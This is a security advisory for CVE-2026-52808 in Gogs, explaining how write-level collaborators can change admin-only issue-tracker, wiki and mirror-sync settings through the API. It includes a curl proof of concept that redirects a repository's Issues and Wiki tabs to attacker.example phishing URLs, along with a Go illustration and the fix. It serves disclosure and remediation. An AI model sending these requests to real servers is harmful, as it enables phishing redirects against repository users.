high · 7.1 · CVE-2026-52808 · Jun 26, 2026

CVE-2026-52808: Gogs Write-Level Collaborator Authorization Bypass on Admin API Endpoints

Shubham Kandhare
Security Engagement Manager, SecureLayer7

Any repository collaborator with write access can call three admin-only Gogs API endpoints to hijack the Issues or Wiki tab with an attacker-controlled redirect URL, because the API routes use a weake

Package: gogs.io/gogs
Ecosystem: go
Affected: < 0.14.3
Fixed in: 0.14.3

The problem

Three API endpoints in Gogs, `PATCH /api/v1/repos/:owner/:repo/issue-tracker`, `PATCH /api/v1/repos/:owner/:repo/wiki`, and `POST /api/v1/repos/:owner/:repo/mirror-sync`, are registered with `reqRepoWriter()` middleware instead of `reqRepoAdmin()`.

The web UI enforces `AccessMode >= AccessModeAdmin` for the same operations, but the API only requires `AccessMode >= AccessModeWrite`. A write-level collaborator can therefore call these endpoints directly and mutate settings that should be admin-only.

Proof of concept

```bash
# Precondition: attacker is a write-level collaborator, NOT a repo admin.

# 1) Redirect the Issues tab to an attacker-controlled phishing page
curl -i -X PATCH "https://TARGET/api/v1/repos/OWNER/REPO/issue-tracker" \
  -H "Authorization: token WRITER_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{"enable_issues":false,"enable_external_tracker":true,"external_tracker_url":"https://attacker.example/phish"}'
# Expected: HTTP 204 No Content

# 2) Redirect the Wiki tab to an attacker-controlled page
curl -i -X PATCH "https://TARGET/api/v1/repos/OWNER/REPO/wiki" \
  -H "Authorization: token WRITER_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{"enable_wiki":false,"enable_external_wiki":true,"external_wiki_url":"https://attacker.example/phish-wiki"}'
# Expected: HTTP 204 No Content

# 3) Force mirror sync (resource abuse)
curl -i -X POST "https://TARGET/api/v1/repos/OWNER/REPO/mirror-sync" \
  -H "Authorization: token WRITER_TOKEN"
# Expected: HTTP 202 Accepted
```

The root cause is a middleware mismatch at route registration in `internal/route/api/v1/api.go` lines 365-367. `reqRepoWriter()` passes any user with `AccessMode >= AccessModeWrite`, while the handlers `issueTracker()` and `wiki()` perform no additional privilege check before writing attacker-controlled URLs directly to the repository record and calling `database.UpdateRepository()`.

The patch replaces `reqRepoWriter()` with `reqRepoAdmin()` on all three routes, aligning the API authorization with the stricter `RequireRepoAdmin()` guard already applied to the equivalent web UI settings pages. This maps to CWE-863 (Incorrect Authorization) and CWE-269 (Improper Privilege Management).
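The middleware mismatch can be shown in miniature. The following Go example is added here and is not Gogs' code: `requireAccess` stands in for `reqRepoWriter()`/`reqRepoAdmin()`, the `issueTracker` stub trusts its guard exactly as the advisory describes, and the `X-Access-Mode` header, `probe` helper and the numeric `AccessMode` values are assumptions so that the check runs offline.

```go
package main

import (
	"net/http"
	"net/http/httptest"
	"strconv"
)

// AccessMode mirrors Gogs' ordered permission ladder; the numeric values are an assumption.
type AccessMode int

const (
	AccessModeNone AccessMode = iota
	AccessModeRead
	AccessModeWrite
	AccessModeAdmin
)

// requireAccess stands in for reqRepoWriter()/reqRepoAdmin(): it rejects callers below the
// required level. The mode is read from a constructed X-Access-Mode header so the example runs
// offline; a real server resolves it from the API token and the collaborator table.
func requireAccess(required AccessMode, next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		n, _ := strconv.Atoi(r.Header.Get("X-Access-Mode")) // absent or malformed => 0 (none)
		if AccessMode(n) < required {
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		next(w, r)
	}
}

// issueTracker stands in for the real handler: it performs no privilege check of its own and
// relies entirely on the middleware it was registered with.
func issueTracker(w http.ResponseWriter, _ *http.Request) {
	w.WriteHeader(http.StatusNoContent)
}

// Vulnerable registration (< 0.14.3): write level suffices, as with reqRepoWriter().
var vulnerableRoute = requireAccess(AccessModeWrite, issueTracker)

// Fixed registration (0.14.3): admin level required, as with reqRepoAdmin().
var fixedRoute = requireAccess(AccessModeAdmin, issueTracker)

// probe sends the PATCH as a caller with the given mode and returns the HTTP status code.
func probe(route http.HandlerFunc, mode AccessMode) int {
	req := httptest.NewRequest(http.MethodPatch, "/api/v1/repos/o/r/issue-tracker", nil)
	req.Header.Set("X-Access-Mode", strconv.Itoa(int(mode)))
	rec := httptest.NewRecorder()
	route(rec, req)
	return rec.Code
}
```

A write-level caller gets 204 from `vulnerableRoute` and 403 from `fixedRoute`, which is the whole difference the patch makes.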

The fix

Upgrade Gogs to version 0.14.3. The fix replaces `reqRepoWriter()` with `reqRepoAdmin()` for the three affected route registrations in `internal/route/api/v1/api.go`. No configuration change is needed; updating the binary is sufficient. Patch commit: `6283462119bd8894f1599d70339b5e823f99954a`.

Reported by bugbunny.ai.
